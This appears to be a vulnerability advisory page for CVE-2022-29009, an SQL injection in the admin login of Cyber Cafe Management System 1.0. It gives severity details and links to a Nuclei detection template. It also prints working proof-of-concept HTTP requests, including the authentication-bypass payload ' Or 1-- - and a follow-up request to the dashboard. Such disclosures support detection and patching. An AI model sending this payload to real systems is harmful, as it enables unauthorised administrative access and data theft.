| Title | Cyber Cafe Management System 1.0 - SQL Injection |
|---|---|
| Author | TenBird |
| Severity | Critical |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 9.8 |
| EPSS Score | 0.87745 |
| CVE ID | CVE-2022-29009 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli auth-bypass edb phpgurukul vuln |
Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
POST /ccms/index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Connection: close
Content-Length: 39
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
username=%27+Or+1--+-&password=1&login=
GET /ccms/dashboard.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5
Connection: close
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29009.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-29009.pcap
N/AN/A